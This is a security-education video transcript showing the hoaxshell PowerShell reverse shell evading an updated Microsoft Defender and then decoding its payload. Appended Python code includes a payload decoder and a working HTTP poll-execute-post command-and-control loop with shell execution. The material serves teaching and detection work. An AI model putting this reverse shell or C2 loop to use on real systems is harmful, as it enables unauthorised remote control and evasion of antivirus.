Reverse Shell UNDETECTED by Microsoft Defender (hoaxshell)

Captions
How easily can you bypass the native, default Microsoft Defender antivirus that is freely available and installed on just about every single Windows operating system host, device and endpoint? We've been on a little bit of a kick in the recent videos, just trying to see what command and control frameworks or what offensive tooling might be able to circumvent and evade and get past that antivirus, and that is the trend I want to keep rolling on in this video, where we get to experiment and play with hoaxshell. But before we dive in, I do want to give some quick love and support and a generous thank you to the sponsor of this video, and we'll roll the promo.

PlexTrac is the premier cybersecurity reporting and collaboration platform that makes penetration testers, red teamers and cybersecurity teams more efficient, effective and proactive. With PlexTrac you can eliminate the dull and boring drudgery of report writing so you can focus on what's really important: hacking the engagement, the assessment and the campaign. And it's not just for offense; PlexTrac is a collaboration portal between both red and blue teams to facilitate effective purple teaming and faster remediation while coordinating between multiple team members. You easily aggregate findings, pull in reusable content from write-up databases and content libraries, and track and measure progress in real time. You can import assets from common CSV files, Nmap, Nessus and many of your other favorite tools; PlexTrac boasts 25-plus integrations, and that list is always growing. You can do even more with PlexTrac's runbooks, with scripts mapped to the MITRE ATT&CK framework or plans from Atomic Red Team, or assessments built off of the CIS controls and benchmarks, and of course show the impact with PlexTrac's analytics and visualizations. Customize your reports with your team's logo and details, and with a single click export your report and send it off to the client. Spend more time hacking and less time reporting. Learn how you can boost your team's efficiency by 30 percent and cut reporting time by up to 65 percent with PlexTrac. Seriously, check them out; I have great colleagues and peers that use PlexTrac every day for reporting. Sign up for a demo and claim your free month of PlexTrac right now at https://jh.io/plextrac. Huge thanks to PlexTrac for sponsoring this video.

Alrighty, so I am inside of my Kali Linux virtual machine, and I'm here on GitHub checking out this repository under this user for hoaxshell. Now this is pretty slick; I've seen this around on the Twitterverse, and I would recommend, if folks aren't tracking on Twitter, there's some super cool offensive security, hey, pen testing, ethical hacking, and a whole lot of blue team, incident response and threat intel you can track down on there. But this is hoaxshell: hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions, solely based on HTTP or HTTPS traffic. The tool is easy to use; it generates its own PowerShell payload and supports encryption with SSL. Now it has been a little bit of time since this has been released; you can see some commits dating back to about three months ago, however some might very well be, hey, one month ago, or 27 days, 28 days, whatever the case may be. So we will kick the tires and go see: does this stick up to the test? Is this still bypassing Microsoft Defender even on an updated Windows 11 machine? Looks like it has been tested on fully updated Windows 11 Enterprise, Windows Server 2016 Datacenter and Windows 10 Pro boxes. You can see some video and screenshots down below, but we will just go ahead and play with it. There's some screenshots, but hey, let's go ahead and roll through the install. Should be super simple, should be pretty easy: hey, we clone the repository, go ahead and install the requirements, and then just run this thing. It's a nice and easy Python script.

So let's fire up a command line, and what I will do is just go ahead and slap in that git clone command. I will end up changing this to be using the git schema, so it does SSH or whatever the shenanigans it tends to do, and I zoomed in way too much, but there we go. We can go ahead and clone this, and now I should have the hoaxshell folder here, which I do, and this is all the stuff that we just saw previously. But ultimately we need to go ahead and install everything out of the requirements.txt file; we'll use pip to do that, but let me just show you what that thing is. I'll cat out those requirements; looks like it just needs IPython, so okay, pretty simple. Let me go ahead and use pip3, and I'll use install -r, so we know that we're going to be retrieving a requirements.txt file, and I'll go ahead and pass that in, reading that file, and it should just go ahead and install stuff for me. Nice and easy. Okay, now that that has finished we should be able to go ahead and play with hoaxshell, but we do need to mark it as executable, and we'll go ahead and work with it.

If you want to trust this thing, you know, actually validate it's not going to be running any crazy malicious code here on your machine, you can fire up the source code, open it in a text editor and see what this thing does. Scroll through it, take a look at some of the sweetness: a whole lot of awesome argument parsing, um, assuming there's going to be some pretty dope ASCII art, and I like that function "chill", hey, just pass, don't do anything. But honestly, hey, super quick cursory look: look, I'm not gonna see any fork bombs or rm -rf or shred in here, like this is all good. Let's go ahead and run this thing. Uh, did I just mark that as executable? I believe I just did, yeah. Okay, cool, so let's go ahead and run hoaxshell. All right, looks like we need to provide a local host IP address; we can supply that with -s, so let me grab my current IP address. I am working inside of my virtual machine, so my current IP is 192.168.11138; we can go and grab that, and let's see what else I need to provide after I give it that -s. Whoa, not a whole lot more; looks like it spat out this giant PowerShell syntax, all this encoded command, the payload here, and this is just, as I mentioned, PowerShell -e, just that encoded syntax, and it is all base64. So let's go ahead and scroll down and grab all this thing.

Now what I want to do is go ahead and grab a virtual machine. I'll spin up the previous Windows 11 machine I was just using playing with Havoc, the command and control framework, because that is a fully up-to-date Windows 11 box. I'll let this thing boot and get back to you. All right, looks like I am here, greeted at my login screen. We'll go ahead and log in, and just to drive the point home here, I'll go ahead and move my face. You'll notice this is Windows 11 Enterprise Evaluation. If I go ahead, just for the sake of showcasing we are on the absolute latest updates, I'll go ahead and check out the Windows Update settings here. If I go ahead and check for updates there should be none available for me, because we are retrieving, working with, absolutely rolling with the latest updates. There it is, okay: you're up to date, absolutely, last checked just now. So we can also verify that the virus and threat protection, Microsoft Defender, is alive and kicking here. I'll go ahead and scroll down to the virus and threat protection settings; you can see real-time protection is on. I do have cloud-delivered protection and the automatic sample submission and all these things kind of turned off, just so they don't rat out, you know, hey, we're playing and poking around with some of this offensive tooling. Now I'll go ahead and actually move this to the side, and we'll get Kali Linux rolling on the other side just as well. And I'll admit here, this is uncharted territory for me; I don't know if this will succeed or not, but we've got hoaxshell waiting on the side, and let's fire up a PowerShell cmdlet, uh, just open up, uh, Windows Terminal is fine, yep, and let's see if I can zoom in on this as it starts up PowerShell. I said "command" there; I should have said "session".

And now I'm slapping all this in. The moment I hit enter, fingers crossed... oh, look at that! Oh, that's awesome: payload execution verified, stabilizing the command prompt, and hoaxshell has a shell. Well dang. Pry back open this, uh, Windows Defender box, or inside the Windows 11 virtual machine: Windows Defender is still, hey, absolutely letting it spin right by. So sweet, let's go ahead and check out what Kali Linux has over here for us. Uh, we can see hoaxshell has got this, and what am I doing? Well, I guess I can run help, and look, that's it, man: you can run any payloads, or honestly now we've got PowerShell, like here I can Ctrl+L to clear the screen. Uh, do I have like a limited command size? Is that why it's not expanding that out? It might be; probably it's trying to detect the screen size of the terminal width, just as I was working with it earlier. But I can pwd, I can go ahead and run whoami, I can net whatever, net user. I have a reverse shell; I am interacting on that target, and Windows Defender is none the wiser. Kind of slick.

Hey, sorry, uh, John from the future here. Didn't want to interrupt, but I was going through editing and I was thinking, you know, there were a couple comments in the Havoc C2 framework video where folks just weren't really digging the fact that, hey, cloud protection and some of the other Defender settings were turned off while testing. I guess that's not a good enough litmus test; they're thinking, yo, maybe Defender doesn't have all the juice when it's not getting that extra support. So let's go ahead and try to run this just as well with, uh, virus and threat protection back open and actually turning those settings on. I've not done this, so I don't know if this will work, but, uh, it's worth a try. Let's go ahead and toggle cloud protection back on, automatic sample submission, sure, whatever, tamper protection, yeah, okay. Okay, there are no exclusions, so, uh, again this should be everything, um, and let's kick the tires here. I'm gonna go ahead and spin up hoaxshell. Uh, now we have a big giant PowerShell payload, and let's grab this syntax. I'll right-click and copy, fire up PowerShell, and let's slap it in and see if we get our callback. Scroll down here, so hoaxshell should hopefully get something, and we'll see. I'll move my face out of the way in case we get a Defender alert. Slapping this in, hitting enter... still comes through, dig it. Let's see, can I run some commands? Go whoami, yep; good old net user, yep; good old pwd. Obviously if I were to do some shenanigans that Defender probably wouldn't like... oh hey, you can see even on this shell the script is getting some AMSI, hey: Invoke-Mimikatz, bad. But we still have our reverse shell, so kind of digging that. Super cool, looks all good. Even with all those buttons, toggles, switches on, Defender letting it cruise by. See ya.

So that's ultimately everything that I kind of wanted to showcase here, but now that we're here, like, cool, we lit off the fireworks, might as well kind of pour in and see what this payload's all about. This is kind of slick. I want to grab that base64, and I could very well just grab this on the Kali Linux machine itself, uh, but let's zoom in here, create a new little terminal here, and let's just make, like, oh, what is that, payload.b64, pasting in all this base64. We can try and go ahead and decode this; I'll use base64 -d on payload.b64, and, uh, let me go ahead and tee that out to another file, so this is like decoded.ps1. We're going to assume, hey, it's probably PowerShell syntax, right? So let's fire that thing up. Oh, and this is it. Looks like we have, okay, what we're calling back to, um, this is my IP address as I entered it, on port 8080, so it just shows that on its own; that's defined as this $s variable in PowerShell. I'm going to assume this $i is maybe for an identifier, looks like a GUID maybe, I could totally be wrong there, but $p is actually going to end up using http as sort of a schema, and then $v as a variable is defined: we Invoke-WebRequest -UseBasicParsing, -Uri at my specific HTTP host and port, slash fc0b61, etc., hosting all of this here for me, and it looks like the headers is where it might be actually retrieving some interesting stuff, given a unique identifier or that $i value there.

Now if I go ahead and check out what this loop is doing, looks like we are in an infinite loop with while($true); $c, we continue to retrieve new portions here, and this is interesting: you'll note, hey, that very, very first syntax, or the hex values defined for our $i variable, looks like it just gets the shell, and then this one here is the second portion, continuing to retrieve data, but we get the content. Okay, if there is no result from it, if it's not equal to "None", then we go ahead and try and Invoke-Expression, or iex, as that PowerShell command with aliases, uh, -ErrorAction is S, so I'm going to assume that's SilentlyContinue. But this is kind of weird to me; I'm not quite sure what we're looking at with some of those random letters and characters. That's wild; what does that end up doing? iex $c being the result of it, and then there's nonsense here. Is that part of its detection portion? Or it looks like there's supposed to be half of a command here; it's doing another request, right, because it needs to use something being set to $i, and then the body, which we retrieve, and then the GetBytes and join, sleep for just under a second here. Interesting, unless this is supposed to be part of the loop, that it has the closing curly brace and that's part of the if statement, so that noise and nonsense here might just be a portion that it's using to get data in and out. Am I wrong? Am I stupid? I mean, I know I am, but it joins it all together, $e and $r. Are $e and $r retrieved? No, that must be from what the server responds with; hoaxshell actually responds, that iex, Invoke-Expression, is going to end up creating some other variables that will end up being used as part of the response here. So let's go ahead and take a look at what this thing does.

I was just scrolling through this source code moments ago to be able to, you know, kind of see, but now I'm just super curious. You could use an encrypted shell, of course, if you wanted to, with your own, hey, silly self-signed certificate or anything, but look at all these arguments you could give it; yeah, you could do so much more. Print banner, it's got that cool stuff, the nice little colors there; help message, that's what we ran when we saw our help command; but encode payload is just, you know, how it's defined. What is that print payload raw going to give me? Is it something that might be different from what we end up seeing? If I use help again, what is raw payload? Oh okay, so this looks a little bit better. Maybe I did something weird with my base64 or assumption, and again, let's, uh, try and add some new lines after all of these semicolons, and let's set this syntax to PowerShell. So now we're doing everything that we've seen previously with a little bit more sense made to it, and we Invoke-Expression as we did before, but retrieve as Out-String given the -InputObject $r, and then communicate right back to it, posting the data back. Huh, was my base64 weird because, hey, I copied it off of, like, Windows or something? Uh, I don't know; we don't need to beautify this, honestly. That's all that I wanted to showcase. Builds up the UUID, has a certain amount of pulse, oh, that's kind of slick, and we could kind of poke around and explore if we really wanted to, but I won't bore you going through all of this right here, right now.

Um, this is again uncharted territory for me. I did want to validate: hey, look, it's still cruising right past Windows Defender, and that is pretty slick. We got a little bit of the knowledge, know-how as to how this was working; I dig that. Move on, mate. Uh, but that's so slick, not something that is detected by Windows Defender, uh, the default native antivirus, even on Windows 11 as fully updated, fully patched, got everything already installed between, you know, updates and new things to pull down; it's all done. Look at that. Cool, super quick video; hey, just wanted to showcase this in case you haven't heard of hoaxshell. That might be something fun to play with, at the moment undetected by Microsoft Defender; maybe some other antivirus solutions are picking it up, I don't know. Being that PowerShell syntax, and sort of that, hey, back-and-forth thing, it's like, cool, not selling an executable that you could just slap into VirusTotal or run through any other sandbox or analyzer; well, it's doing its thing with Python and PowerShell just handing data back and forth. Slick. Wanted to raise awareness, wanted to bring the education to you, and I thought maybe that's some cool, nice little fit-in for stuff that we do for ethical hacking, penetration testing, red teaming, etc. With that said, I do want to give some, a lot more of that love to PlexTrac; huge thanks for sponsoring this video, and I'm looking forward to the next one where we can jam together. Thanks so much for watching, everybody. See you in the next video.
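Editor's note on the decode step in the video: the raw `base64 -d` output of the `powershell -e` payload looked off, and the tool's raw-payload view read more cleanly. That is expected, and not a copy-paste problem: `-EncodedCommand` takes base64 over UTF-16LE text, so a plain base64 decode leaves a NUL byte after every ASCII character. The following is an added example, not code from the page or from hoaxshell: it decodes such a payload properly and pulls out the callback host and port. SAMPLE_SCRIPT is a constructed stand-in with the same shape as the loop the video reads out (callback host:port, session identifier, while($true) poll, iex on fetched text, output POSTed back, short sleep); the /poll and /result paths and the X-Session header are my own invention, not the tool's.

```python
import base64
import re

# Constructed sample, illustration only (not hoaxshell's actual payload).
# Endpoint names and the header name are assumptions made for this example.
SAMPLE_SCRIPT = (
    '$s="192.0.2.10:8080";$i="a1b2c3d4";$p="http://";'
    'while($true){'
    '$c=(Invoke-WebRequest -UseBasicParsing -Uri ($p+$s+"/poll") '
    '-Headers @{"X-Session"=$i}).Content;'
    'if($c -ne "None"){$r=(iex $c -ErrorAction SilentlyContinue|Out-String);'
    'Invoke-WebRequest -UseBasicParsing -Uri ($p+$s+"/result") -Method POST '
    '-Headers @{"X-Session"=$i} -Body ([Text.Encoding]::UTF8.GetBytes($r))|Out-Null};'
    'Start-Sleep -Milliseconds 800}'
)

# A quoted "host:port" literal: dotted-quad IP or hostname, then a port.
CALLBACK_RE = re.compile(r'"(\d{1,3}(?:\.\d{1,3}){3}|[A-Za-z0-9.-]+):(\d{1,5})"')


def encode_powershell_command(script: str) -> str:
    """Build the argument for `powershell -e`: base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def naive_decode(b64: str) -> bytes:
    """What `base64 -d` gives you: raw UTF-16LE bytes, a NUL after every
    ASCII character, which is why the output looks odd in a text editor.
    Whitespace (line breaks from pasting) is dropped before decoding."""
    return base64.b64decode("".join(b64.split()))


def decode_powershell_command(b64: str) -> str:
    """Correct decode: base64, then UTF-16LE back to text."""
    return naive_decode(b64).decode("utf-16-le")


def null_byte_ratio(raw: bytes) -> float:
    """Share of NUL bytes; 0.5 for an ASCII-only script in UTF-16LE."""
    return raw.count(0) / len(raw) if raw else 0.0


def extract_callback(script: str):
    """Pull (host, port) out of the decoded script; None if not present."""
    m = CALLBACK_RE.search(script)
    return (m.group(1), int(m.group(2))) if m else None


def pretty(script: str) -> str:
    """Same trick as in the video: newline after each ';' for readability."""
    return script.replace(";", ";\n")


def triage(b64: str) -> dict:
    """Decode and summarise the indicators an analyst wants from such a blob."""
    script = decode_powershell_command(b64)
    return {
        "script": script,
        "callback": extract_callback(script),
        "beacons": "while($true)" in script and "Invoke-WebRequest" in script,
        "uses_iex": bool(re.search(r"\b(iex|Invoke-Expression)\b", script, re.I)),
    }


if __name__ == "__main__":
    blob = encode_powershell_command(SAMPLE_SCRIPT)
    print(pretty(triage(blob)["script"]))
    print(triage(blob)["callback"])
```

If you only have the blob, `triage(blob)` gives the callback and the two structural tells (polling loop, iex on fetched content) without ever executing anything; the `naive_decode` result is kept so you can see the NUL-padded bytes that confused the plain `base64 -d` run.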
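The request/response loop the video reads out of the decoded payload, re-created as an added example (not hoaxshell's code, and not a reproduction of its wire format): an implant polls the listener over HTTP with a session identifier in a header, gets either a command or a "None" sentinel, executes the command, POSTs the output back, sleeps, and repeats. Both halves are written in Python, the tool's own language, so the exchange runs offline in one process; the real payload's PowerShell side does Invoke-WebRequest and iex where this client does urlopen and a pluggable executor. The /poll and /result paths, the X-Session header name and the session id value are my assumptions for the example.

```python
import http.server
import queue
import subprocess
import threading
import time
import urllib.request


class Session:
    """Server-side state for one implant, keyed by the identifier it sends."""

    def __init__(self) -> None:
        self.commands: "queue.Queue[str]" = queue.Queue()
        self.results: list = []


def make_handler(sessions: dict, log: list):
    """Listener half. `log` collects (method, path, session id, time)."""

    class Handler(http.server.BaseHTTPRequestHandler):
        def log_message(self, *args) -> None:  # keep the demo quiet
            pass

        def _reply(self, body: bytes, status: int = 200) -> None:
            self.send_response(status)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def do_GET(self) -> None:
            # Implant asks for work; the session id rides in a header
            # (header name X-Session is assumed for this example).
            sid = self.headers.get("X-Session", "")
            log.append(("GET", self.path, sid, time.monotonic()))
            sess = sessions.get(sid)
            if self.path != "/poll" or sess is None:
                return self._reply(b"not found", 404)
            try:
                cmd = sess.commands.get_nowait()
            except queue.Empty:
                cmd = "None"  # sentinel: nothing queued, keep polling
            self._reply(cmd.encode())

        def do_POST(self) -> None:
            # Implant returns command output for its session.
            sid = self.headers.get("X-Session", "")
            log.append(("POST", self.path, sid, time.monotonic()))
            sess = sessions.get(sid)
            body = self.rfile.read(int(self.headers.get("Content-Length", "0")))
            if self.path != "/result" or sess is None:
                return self._reply(b"not found", 404)
            sess.results.append(body.decode("utf-8", "replace"))
            self._reply(b"")

    return Handler


def implant_loop(base_url: str, session_id: str, run,
                 interval: float = 0.05, max_polls: int = 200) -> int:
    """Client half: GET /poll, run what comes back, POST the output, sleep.
    `run` stands in for PowerShell's iex. Returns the number of polls made."""
    headers = {"X-Session": session_id}
    polls = 0
    while polls < max_polls:
        polls += 1
        req = urllib.request.Request(base_url + "/poll", headers=headers)
        with urllib.request.urlopen(req) as resp:
            cmd = resp.read().decode()
        if cmd == "exit":
            break
        if cmd != "None":
            out = run(cmd)
            req = urllib.request.Request(base_url + "/result", data=out.encode(),
                                         method="POST", headers=headers)
            urllib.request.urlopen(req).close()
        time.sleep(interval)  # fixed interval: this is what makes it a beacon
    return polls


def shell_executor(cmd: str) -> str:
    """Real executor: runs the command through the local shell."""
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_demo(commands: list, run=shell_executor, session_id: str = "a1b2c3d4"):
    """Start the listener on a loopback port, queue `commands` for one session,
    drive the implant loop against it, and return (results, request log)."""
    sessions, log = {session_id: Session()}, []
    for cmd in commands + ["exit"]:
        sessions[session_id].commands.put(cmd)
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0),
                                             make_handler(sessions, log))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        implant_loop("http://127.0.0.1:%d" % server.server_address[1],
                     session_id, run)
    finally:
        server.shutdown()
        server.server_close()
    return sessions[session_id].results, log


if __name__ == "__main__":
    results, log = run_demo(["echo hello from the implant"])
    print(results)
    print([(m, p) for m, p, _, _ in log])
```

Note what the server-side log shows even in this toy: one GET per sleep interval whether or not work is queued, each carrying the same identifier, with a POST only after a non-"None" response. That regular GET cadence to one URI is the network-side signal such a loop leaves regardless of what the host antivirus thinks of the script.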
Info
Channel: John Hammond
Views: 155,900
Keywords: cybersecurity, learn, programming, coding, capture the flag, ctf, malware, analysis, dark web, how to learn cybersecurity, beginners
Id: fgSARG82TJY
Length: 17min 43sec (1063 seconds)
Published: Tue Oct 11 2022